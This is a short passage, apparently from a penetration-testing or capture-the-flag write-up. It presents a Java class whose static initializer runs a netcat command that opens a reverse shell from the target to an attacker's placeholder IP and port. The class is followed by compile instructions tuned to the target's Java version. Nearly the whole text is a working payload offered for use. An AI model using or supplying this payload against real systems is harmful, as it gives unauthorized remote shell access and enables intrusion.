A simple Java exploit that pops a reverse shell (at least on Linux systems with a version of netcat that supports the -e switch) is:
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 1.2.3.4 9999");
} catch (Exception e) {
e.printStackTrace();
}
}
}Where 1.2.3.4 is the IP you’re catching the reverse shell at and 9999 is the port of the listener. This can be compiled with:
javac Exploit.java -source 8 -target 8Note that the -source and -target flags may need to be modified depending on which version of Java the target is running. As with all things Java, the file name and file class name need to match.